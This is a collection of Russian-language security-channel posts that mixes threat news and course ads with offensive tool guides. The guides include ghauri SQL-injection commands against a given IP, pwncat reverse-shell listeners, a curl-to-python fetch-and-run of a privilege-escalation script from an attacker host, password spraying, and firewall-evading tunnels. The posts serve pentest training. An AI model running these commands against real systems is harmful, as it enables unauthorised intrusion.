Растет тенденция использования кибергруппировками в атаках сертификатов с расширенной проверкой (EV). Основные злоупотребления включают использование кодовых подписей для обхода мер безопасности, получения привилегий и создания доверия у пользователей. Злоумышленники могут приобретать EV-сертификаты на теневых рынках за $2000-6000. Получение сертификатов возможно через создание фиктивных компаний или кражу подписей у реальных организаций, как это произошло с NVIDIA, которые затем использовались в реальных атаках. Это позволяет им подписывать вредоносное ПО и распространять его под видом легитимного.
Злоумышленники используют купленные электронные подписи для:
🔸Обхода антивирусных проверок и повышения доверия к их программам.
🔸Получения административных привилегий в операционных системах.
🔸Публикации вредоносного кода, который выглядит как подписанный легитимным разработчиком, что снижает подозрения у пользователей и систем безопасности
Чтобы снизить риски специалисты Intrinsec рекомендуют:
🔸 Строгие правила белого и черного списков приложений.
🔸 Тщательная проверка валидности сертификатов.
🔸 Проверка отзыва сертификатов.
🔸 Использование репутационной аналитики для обнаружения вредоносных сертификатов.
🔸 Применение техники песочниц и изоляции для неизвестных исполняемых файлов
Для блокировки недоверенных сертификатов в Windows используются следующие механизмы:
🔸Контроль доступа к сертификатам через Certificate Trust Lists (CTL), которые позволяют доверять только определенным сертификатам или блокировать недоверенные.
🔸 Групповые политики: через Group Policy можно настроить блокировку исполняемых файлов, подписанных недоверенными сертификатами.
🔸 SmartScreen: технология, которая проверяет цифровые подписи приложений и блокирует их, если сертификаты недоверенные или отозваны.
🔸 AppLocker: позволяет настроить правила для запуска только тех приложений, которые подписаны доверенными сертификатами.
Злоумышленники используют купленные электронные подписи для:
🔸Обхода антивирусных проверок и повышения доверия к их программам.
🔸Получения административных привилегий в операционных системах.
🔸Публикации вредоносного кода, который выглядит как подписанный легитимным разработчиком, что снижает подозрения у пользователей и систем безопасности
Чтобы снизить риски специалисты Intrinsec рекомендуют:
🔸 Строгие правила белого и черного списков приложений.
🔸 Тщательная проверка валидности сертификатов.
🔸 Проверка отзыва сертификатов.
🔸 Использование репутационной аналитики для обнаружения вредоносных сертификатов.
🔸 Применение техники песочниц и изоляции для неизвестных исполняемых файлов
Для блокировки недоверенных сертификатов в Windows используются следующие механизмы:
🔸Контроль доступа к сертификатам через Certificate Trust Lists (CTL), которые позволяют доверять только определенным сертификатам или блокировать недоверенные.
🔸 Групповые политики: через Group Policy можно настроить блокировку исполняемых файлов, подписанных недоверенными сертификатами.
🔸 SmartScreen: технология, которая проверяет цифровые подписи приложений и блокирует их, если сертификаты недоверенные или отозваны.
🔸 AppLocker: позволяет настроить правила для запуска только тех приложений, которые подписаны доверенными сертификатами.
🔥12❤9👍8
Внимание! До конца ноября у вас есть возможность купить курсы декабря по старым ценам*:
*С декабря стоимость курсов увеличится на 15%
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍9❤7👎2
В новой статье мы покажем два подхода, которые используют OSINT-специалисты для сбора информации в VK. На примере реального кейса разберём, как можно получить максимум данных, начиная с простого никнейма или фотографии.
на обновленном курсе Академии здесь
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥7❤6🎉1
Расширение Hide YouTube Shorts для Chrome после смены владельца стало вредоносным. Вредоносный код был добавлен сразу после смены владельца. В результате чего, плагин начал заниматься мошенничеством с партнёрскими программами и отправлять псевдонимизированные данные пользователей на облачный сервер Amazon. Партнерское мошенничество направлено на генерацию прибыли, используя домен kra18[.]com, который заменяет ссылки на реферальные.
Список некоторых из затронутых популярных расширений:
⏺️ Hide YouTube Shorts
⏺️ Dynamics 365 Power Pane
⏺️ Karma | Online shopping, but better
⏺️ Visual Effects for Google Meet
⏺️ M3U8 Downloader
Расширения стали вредоносными после передачи прав в середине 2023 года. Особое внимание вызывает расширение Karma.
👀 Вредоносный код в расширениях не был обфусцирован или замаскирован. Каждая часть кода по отдельности выглядит довольно безобидно, но в совокупности внедрённые функции приводят к нелегитимным воздействиям.
❓ Зачем Karma Shopping нужны данные о пользователях?
Во-первых, партнёрские комиссии — это их основной вид деятельности и их целью является увеличение числа пользователей. Во-вторых, исходя из политики конфиденциальности компании, сбор данных о посещенных страницах является официальным и Karma утверждает, что продаёт эти данные третьим лицам, для более точного предоставления услуг пользователям.
⚙️ Несмотря на жалобы пользователей Google не реагирует.
Оповещение о проблеме происходит в формате заполнения формы, в которой причинами недовольства расширением служит «не соответствует ожиданиям» или «недружелюбное содержимое». Более точные и детализированные отзывы остаются без ответа.
#новости
Список некоторых из затронутых популярных расширений:
Расширения стали вредоносными после передачи прав в середине 2023 года. Особое внимание вызывает расширение Karma.
Во-первых, партнёрские комиссии — это их основной вид деятельности и их целью является увеличение числа пользователей. Во-вторых, исходя из политики конфиденциальности компании, сбор данных о посещенных страницах является официальным и Karma утверждает, что продаёт эти данные третьим лицам, для более точного предоставления услуг пользователям.
Оповещение о проблеме происходит в формате заполнения формы, в которой причинами недовольства расширением служит «не соответствует ожиданиям» или «недружелюбное содержимое». Более точные и детализированные отзывы остаются без ответа.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤8🔥8😱2
Поддерживаемые техники:
Boolean based
Error Based
Time Based
Stacked Queries
Поддерживаемые СУБД:
MySQL
Microsoft SQL Server
Postgres
Oracle
Поддерживаемые типы:
GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML
Добавлена поддержка:
--sql-shell --proxygit clone https://github.com/r0oth3x49/ghauri.git
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25🔥9❤4✍3
pip3 install git+https://github.com/GreyDGL/PentestGPT
Для корректной работы нам понадобится ключ для доступа к API OpenAI
shell export OPENAI_API_KEY='<your key here>'
pentestgpt-connection
pentestgpt --reasoning_model=gpt-4-turbo
После всех проделанных шагов вы можете начать общение с дообученым помощником, который может самостоятельно проводить базовые проверки
Please open Telegram to view this post
VIEW IN TELEGRAM
❤35👍16🔥13🤯3😢1
Исследователи из CloudSEK выявили тревожное обновление в деятельности ботнета Androxgh0st: с начала 2024 года он нацелен на веб-серверы и активно эксплуатирует уязвимости в известных технологиях, таких как Cisco ASA, Atlassian JIRA и различные PHP-фреймворки.
Ключевые уязвимости, на которые нацелен Androxgh0st:
🔸 CVE-2017-9841 в PHPUnit, дающий бэкдор-доступ к вебсайтам
🔸 CVE-2018-15133 в Laravel, позволяющий выполнить зашифрованный код
🔸 CVE-2021-41773 в Apache, позволяющий атаки обхода путей
Mozi, ранее активно использовавший уязвимости в IoT-устройствах, таких как маршрутизаторы и DVR, был разгромлен в 2021 году. Однако Androxgh0st, судя по последним данным командных логов, внедрил Mozi-загрузки в свою инфраструктуру, что делает его ещё более опасным для IoT-среды.
#новости
🗣️ Недавний отчет показал, что Androxgh0st теперь использует компоненты от ботнета Mozi, расширяя своё влияние на устройства интернета вещей (IoT) и возможное сотрудничество между двумя ботнетами.
Ключевые уязвимости, на которые нацелен Androxgh0st:
Mozi, ранее активно использовавший уязвимости в IoT-устройствах, таких как маршрутизаторы и DVR, был разгромлен в 2021 году. Однако Androxgh0st, судя по последним данным командных логов, внедрил Mozi-загрузки в свою инфраструктуру, что делает его ещё более опасным для IoT-среды.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤6🔥6
This media is not supported in your browser
VIEW IN TELEGRAM
🚩 Новые задания на платформе Codeby Games!
🔑 Категория Криптография — Широковещание
🔎 Категория OSINT — Кого ищем?
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17👍10❤6
Chisel — это многофункциональная утилита для создания защищенных туннелей TCP/UDP поверх HTTP и HTTPS. Если вам нужно обойти firewall или организовать безопасную точку доступа в сети, Chisel может стать отличным решением. В новой статье разберем подробнее этот инструмент.
🔍 Что такое Chisel и как это работает?
Chisel — это компактное приложение, объединяющее в себе клиент и сервер для туннелирования TCP и UDP трафика. Используя HTTP или HTTPS, Chisel проходит через firewall, маскируясь под стандартный веб-трафик и работая поверх WebSocket. Это позволяет обмениваться данными через часто разрешенные порты (80 или 443), делая трафик менее заметным для фильтров.
❓ Почему это трудно обнаружить?
Chisel отправляет данные в зашифрованных WebSocket фреймах через стандартные порты. Даже глубокая проверка пакетов (DPI) часто не видит, что внутри трафика, так как данные зашифрованы и выглядят как обычная HTTPS-сессия. Это помогает обойти ограничения сети, включая NAT и прокси.
⚙️ Практическое применение Chisel
Для того чтобы разобраться, как это работает, мы проведем небольшой эксперимент с сервером и клиентом на Linux, установим Chisel и настроим туннель. В конце анализа разберем захваченный трафик и посмотрим, как Chisel шифрует его на уровне фреймов.
➡️ Читать подробнее
Chisel — это компактное приложение, объединяющее в себе клиент и сервер для туннелирования TCP и UDP трафика. Используя HTTP или HTTPS, Chisel проходит через firewall, маскируясь под стандартный веб-трафик и работая поверх WebSocket. Это позволяет обмениваться данными через часто разрешенные порты (80 или 443), делая трафик менее заметным для фильтров.
Chisel отправляет данные в зашифрованных WebSocket фреймах через стандартные порты. Даже глубокая проверка пакетов (DPI) часто не видит, что внутри трафика, так как данные зашифрованы и выглядят как обычная HTTPS-сессия. Это помогает обойти ограничения сети, включая NAT и прокси.
Для того чтобы разобраться, как это работает, мы проведем небольшой эксперимент с сервером и клиентом на Linux, установим Chisel и настроим туннель. В конце анализа разберем захваченный трафик и посмотрим, как Chisel шифрует его на уровне фреймов.
Please open Telegram to view this post
VIEW IN TELEGRAM
2❤14🔥8👍6
Что не так с netcat ?
Пример классического подключения:
nc 1.1.1.1 4444
remote$ python -c "import pty; pty.spawn('/bin/bash')"
remote$ Ctrl + Z
local$ stty raw -echo
local$ fg
Установка:
python3 -m venv pwncat-env
source pwncat-env/bin/activate
pip install pwncat-cs
Основные опции:
# Connect to a bind shell
pwncat-cs 10.10.10.10:4444
# Listen for reverse shell
pwncat-cs -lp 4444
# Connect via ssh
pwncat-cs user@10.10.10.10
pwncat-cs user:password@10.10.10.10
pwncat-cs -i id_rsa user@10.10.10.10
# SSH w/ non-standard port
pwncat-cs -p 2222 user@10.10.10.10
pwncat-cs user@10.10.10.10:2222
# Reconnect utilizing installed persistence
# If reconnection fails and no protocol is specified,
# SSH is used as a fallback.
pwncat-cs reconnect://user@10.10.10.10
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs user@10.10.10.10
pwncat-cs c228fc49e515628a0c13bdc4759a12bf
Табы работают, по Ctrl + C сессия не рвется.
Переключение между режимами(local <> remote) Ctrl + D
Есть полезные фичи как Upload с хоста на жертву, так и наоборот Download.
Модули escalate и enumerate для ленивых
run enumerate types=file.suid
run enumerate
Please open Telegram to view this post
VIEW IN TELEGRAM
2❤21👍12🔥7✍2🤩1
На форуме запустили лотерею, где можно выиграть любой курс Академии Кодебай, стартующий в декабре 2024 года. Как только будет разыграно 6 подписок на курс, лотерея будет остановлена. Розыгрыш каждые 3 дня до конца ноября 2024 года.
Нажмите "Купить билет" и выберите 7 цифр, после чего нажмите кнопку "Приобрести".
Быстро заработать на билет можно приглашая участников форума. За каждого реферала начисляем 25 BIT. Ссылка для приглашения находится у вас в профиле форума.
Нажмите "Купить билет" и выберите 7 цифр, после чего нажмите кнопку "Приобрести".
Быстро заработать на билет можно приглашая участников форума. За каждого реферала начисляем 25 BIT. Ссылка для приглашения находится у вас в профиле форума.
2👍18🔥7❤6
Авто повышение привилегий на .nix подобных системах используя мисконфигурации в setuid/setgid файлах, capabilities и sudo привилегиях.
Разработано специально для CTF, но может использоваться и в реальных условиях. Информацию берет с известного ресурса GTFO
Использование:
python gtfonow.py [OPTIONS]
python gtfonow.py --command 'ls -la' --level 2 --risk 2
curl http://attacker.host/gtfonow.py | python
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍10❤5
Теперь данные пользователей на hh.ru защищены ещё лучше.
В знаковый для рынка труда момент HeadHunter объявила о присоединении к Отраслевому стандарту защиты данных, разработанному Ассоциацией больших данных.
Отраслевой стандарт представляет собой свод рекомендаций и практических мер, направленных на установление стандартов для хранения и защиты данных. Он помогает оценить эффективность процессов в системе информационной безопасности и внедрять лучшие практики.
Соглашение было подписано 11 ноября 2024 года в Москве. «Будучи одной из крупнейших платформ по поиску работы, HeadHunter обрабатывает и хранит огромный массив персональных данных», — отметила директор по информационным технологиям и кибербезопасности hh.ru Татьяна Фомина. «Присоединение к стандарту – это подтверждение нашей приверженности защите информации и повышению уровня доверия к платформе».
#новости
В знаковый для рынка труда момент HeadHunter объявила о присоединении к Отраслевому стандарту защиты данных, разработанному Ассоциацией больших данных.
Отраслевой стандарт представляет собой свод рекомендаций и практических мер, направленных на установление стандартов для хранения и защиты данных. Он помогает оценить эффективность процессов в системе информационной безопасности и внедрять лучшие практики.
Соглашение было подписано 11 ноября 2024 года в Москве. «Будучи одной из крупнейших платформ по поиску работы, HeadHunter обрабатывает и хранит огромный массив персональных данных», — отметила директор по информационным технологиям и кибербезопасности hh.ru Татьяна Фомина. «Присоединение к стандарту – это подтверждение нашей приверженности защите информации и повышению уровня доверия к платформе».
#новости
👍14❤9🔥9
WebTTY
WebTTY – инструмент, обеспечивающий доступ к администрированию удаленных устройств с помощью технологии WebRTC, то есть подключение к другому устройству может происходить без настройки прокси-сервера и наличия открытых портов SSH. Рассмотрим как осуществить удаленное подключение через браузер.
Особенности инструмента:
🔸 Возможность работы WebTTY в браузере, что позволяет обойти защитные меры фаерволла. Подключение происходит через страницу https://maxmcd.github.io/webtty/.
🔸 Шифрование передаваемых данных засчёт использования технологии WebRTC.
🔸 Работа в одностороннем и двухстороннем соединении.
✏️ Принцип работы:
1. На стороне сервера запускается WebTTY, который генерирует необходимые данные для установления WebRTC-соединения (SDP-описание).
2. Данные передаются клиенту, который в свою очередь генерирует свой ответ серверу(оффер).
3. После успешного обмена соединениями клиент получает доступ к командной строке сервера через веб-интерфейс.
Уточнение! Обмен необходимо производить копируя ключи вручную.
Установка и запуск
🔸 Скачаем архив и распакуем утилиту с помощью команды:
🔸 Запустим утилиту
⚙️ После запуска происходит генерация данных для подключения, которые необходимо скопировать в браузер по приведенной выше ссылке. Далее полученный ответ в браузере копируем на сервер и получаем соединение!
WebTTY – инструмент, обеспечивающий доступ к администрированию удаленных устройств с помощью технологии WebRTC, то есть подключение к другому устройству может происходить без настройки прокси-сервера и наличия открытых портов SSH. Рассмотрим как осуществить удаленное подключение через браузер.
Особенности инструмента:
1. На стороне сервера запускается WebTTY, который генерирует необходимые данные для установления WebRTC-соединения (SDP-описание).
2. Данные передаются клиенту, который в свою очередь генерирует свой ответ серверу(оффер).
3. После успешного обмена соединениями клиент получает доступ к командной строке сервера через веб-интерфейс.
Уточнение! Обмен необходимо производить копируя ключи вручную.
Установка и запуск
tar -xvzf webtty_0.5.1_Linux_x86_64.tar.gz
./webtty
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍9❤8👎1
Инструмент все в одном для автоматического исследования хоста путем запуска наилучшего набора средств сканирования и обнаружения уязвимостей
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d target.com -r
# Single Target
sudo ./reconftw.sh -d target.com -r
# List of Targets
sudo ./reconftw.sh -l sites.txt -r -o /output/directory/
# Yolo mod (all tasks)
sudo ./reconftw.sh -d target.com -a
#Deep scan
./reconftw.sh -d target.com -r --deep -o /output/directory/
# Recon in a multi domain target
./reconftw.sh -m company -l domains_list.txt -r
# Osint
Domain information
Emails addresses and passwords leaks
Metadata finder
API leaks search
# Subdomains
Certificate transparency
NOERROR subdomain discovery
Bruteforce
Permutations
JS files & Source Code Scraping
DNS Records
# Hosts
IP info
CDN checker
WAF checker
Port Scanner
Port services vulnerability checks
Password spraying
Geolocalization info
# Webs
Web Prober
Web screenshoting
Web templates scanner
CMS Scanner
Url extraction
Favicon Real IP
Fuzzing
Wordlist generation
Passwords dictionary creation
# Vulnerability checks
XSS
Open redirect
SSRF
CRLF
Cors
LFI Checks
SQLi Check
SSTI
SSL tests
4XX Bypasser
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥10❤5
Forwarded from Codeby One — пентест глазами исполнителя
Для компании утечка данных — это не только риск потери информации, но и серьёзные репутационные и финансовые последствия. Все об утечке данных читайте в новой статье.
Методы кражи данных, которые используют мошенники:
🔸 Фишинг: Создание фейковых сайтов и поддельных писем, чтобы обманом получить у сотрудников доступ к данным.
🔸 Брутфорс-атаки: Автоматический подбор паролей для доступа к аккаунтам и хранилищам.
🔸 Программы-шпионы: Вирусы, которые внедряются в операционные системы и незаметно отправляют данные злоумышленникам.
✉️ Какие данные могут быть украдены?
Чаще всего атакуют персональные данные клиентов, финансовые сведения, бизнес-информацию, а также предметы интеллектуальной собственности, такие как патенты и разработки.
5 признаков уязвимости информации в компании:
🔸 Высокая текучка сотрудников.
🔸 Постоянные командировки с использованием рабочей техники.
🔸 Активное взаимодействие с контрагентами, требующее обмена данными.
🔸 Сложная IT-инфраструктура с распределёнными правами доступа.
🔸 Обслуживание техники в сторонних сервисах.
В условиях, когда утечки данных могут затронуть любую компанию, важно принимать активные меры по защите информации, обучать сотрудников и контролировать все возможные каналы утечки.
➡️ Читать подробнее в блоге
🗣️ Когда злоумышленники получают доступ к персональной, финансовой или коммерческой информации, последствия для бизнеса могут быть разрушительными: от потери клиентов до временной остановки бизнес-процессов.
Методы кражи данных, которые используют мошенники:
Чаще всего атакуют персональные данные клиентов, финансовые сведения, бизнес-информацию, а также предметы интеллектуальной собственности, такие как патенты и разработки.
5 признаков уязвимости информации в компании:
В условиях, когда утечки данных могут затронуть любую компанию, важно принимать активные меры по защите информации, обучать сотрудников и контролировать все возможные каналы утечки.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤6🔥4
Роскомнадзор работает над созданием национальной системы защиты IР-маршрутизации от внешних угроз. (это следует из Стратегии развития телекоммуникационной отрасли до 2035 г., утвержденной Правительством).
🔑 Предполагаем, что речь идет о создании в России инфраструктуры для протокола
▶️ RPKI (Resource Public Key Infrastructure/Инфраструктура открытых ключей ресурсов),
решение является расширением протокола
▶️ BGP (Border Gateway Protocol/Протокол динамической маршрутизации), отвечающего за динамическую маршрутизацию в интернете.
⚡️ Согласно заявлению ведомства, новая система обеспечит надежную защиту российских сетей от атак типа "DDoS", от попыток манипулирования трафиком и подмены IР-адресов.
🆕 Новые технологии, которые планируют внедрить в рамках данного проекта:
⏺️ Система раннего обнаружения атак (мониторинг трафика для выявления подозрительной активности и блокирования атак на ранней стадии).
⏺️ Централизованная система управления маршрутизацией (повышение устойчивости интернет-инфраструктуры путем распределения трафика и предотвращения перегрузок).
⏺️ Система защиты от DNS-подмены (предотвращение подмены DNS-записей, которые могут перенаправлять пользователей на вредоносные сайты).
❗️ Проект позволит значительно повысить уровень кибербезопасности в России и обеспечить надежную защиту российских пользователей от внешних угроз.
решение является расширением протокола
Please open Telegram to view this post
VIEW IN TELEGRAM
👎24👍10❤6🔥3😁3🤔2😢1👾1
Многие трояны в ОС Android довольно примитивны, так как их задачей является лишь перенаправить пользователя на вредоносный сайт при открытии приложения. Однако специалисты из компании Dr.Web обнаружили новый вредонос Android.FakeApp.1669, который отличается использованием модифицированной библиотеки dnsjava.
😳 В настоящий момент варианты троянских программ Android.FakeApp.1669 были загружены через Google Play около 2 160 000 раз!
✏️ Среди зараженных приложений можно выделить:
⏺️ Split it: Checks and Tips
⏺️ FlashPage parser
⏺️ BeYummy - your cookbook
⏺️ Memogen
⏺️ Display Moving Message
⏺️ WordCount
🎰 При запуске приложение получает с вредоносного DNS-сервера TXT-запись, содержащую зашифрованную целевую ссылку. Троян загружает её в WebView внутри своего окна поверх основного интерфейса. Ссылка ведет на сайт с длинной цепочкой перенаправлений, конечной точкой которой становится страница онлайн-казино.
❗️ При этом сервер отдает TXT-запись только если зараженное устройство подключено к интернету через определенных провайдеров. В остальных случаях приложение предоставляет заявленный разработчиком функционал.
🎰 При запуске приложение получает с вредоносного DNS-сервера TXT-запись, содержащую зашифрованную целевую ссылку. Троян загружает её в WebView внутри своего окна поверх основного интерфейса. Ссылка ведет на сайт с длинной цепочкой перенаправлений, конечной точкой которой становится страница онлайн-казино.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14❤6🔥6
Злоумышленники обладают большими ресурсами и связями с другими группами для проведения масштабных кибератак. Их основная цель – кибершпионаж. Для проникновения в целевую сеть группа активно применяет эксплуатацию публично доступных сервисов на периметре, доступ через подрядчика и легитимные аккаунты.
В одном из расследованных кейсов специалисты наблюдали в журналах следующие запросы:
Как видно из запроса, использовался некоторый клиент для WinRM, написанный на Ruby. Но интересно тут указание порта 443, ведь WinRM работает на 5985, 5986 портах.
💻 WinRM — это название как службы, так и протокола Windows, использующегося для удаленного управления, администрирования и мониторинга систем. Обычно используется злоумышленниками для перемещения в инфраструктуре жертвы.
⬇️ Оказывается с помощью представленных ниже команд можно сконфигурировать WinRM так, чтобы в дополнении к стандартным портам добавлялись порты 80, 443.
⏺️ winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
⏺️ winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"}
✏️ Используя эту особенность, злоумышленники могут ввести в заблуждение исследователей безопасности, мимикрируя под обычный трафик в инфраструктуре.
В одном из расследованных кейсов специалисты наблюдали в журналах следующие запросы:
POST /wsman 443 – 45.12.67.18 HTTP/1.1 Ruby+WinRM+Client+(2.8.3,+ruby+2.7.2+(2020-10-01))
Как видно из запроса, использовался некоторый клиент для WinRM, написанный на Ruby. Но интересно тут указание порта 443, ведь WinRM работает на 5985, 5986 портах.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15👍8🔥4👾4
Российский разработчик решений для инфраструктуры, Компания «Базис» представил обновленную версию своего продукта Basis Virtual Security 3.2, в котором более 100 новых функций и улучшений.
✔️ Основные изменения:
🔸 Возможность резервного копирования виртуальных машин. Причем возможность создания резервного копирования возможно как для работающих виртуальных машин, так и для остановленных. Для их хранения возможно использовать NFS-хранилище.
🔸 Доработан графический интерфейс Процесс резервного копирования и восстановления виртуальных машин для администраторов стало удобнее.
🔸 Обновленные инструменты для работы с контролем целостности виртуальных машин и работы с контрольными суммами.
🔸 Обновленные политики целостности. Теперь при нарушении целостности появилась возможность запрета запуска ВМ при нарушении контрольных сумм.
🔸 Появилось журналирование задачи подсчета контрольных сумм, а для их вычислений есть возможность использовать отечественные алгоритмы стандарта ГОСТ Р 34.11 – 2012.
На фоне глобальных новостей по поводу импортзамещений данный релиз выглядит очень хорошим, и его использование совместно с другими платформами виртуализации поможет закрыть большинство технических мер защиты виртуальных сред.
#новости
Стоит отметить, что данный продукт получил соответствие требованиям ФСТЭК по 4 уровню доверия (УД4) достаточно быстро. Ранее компания уменьшила срок прохождения испытаний ФСТЭК с 6 месяцев до 3.
На фоне глобальных новостей по поводу импортзамещений данный релиз выглядит очень хорошим, и его использование совместно с другими платформами виртуализации поможет закрыть большинство технических мер защиты виртуальных сред.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤5🔥4👎3😁2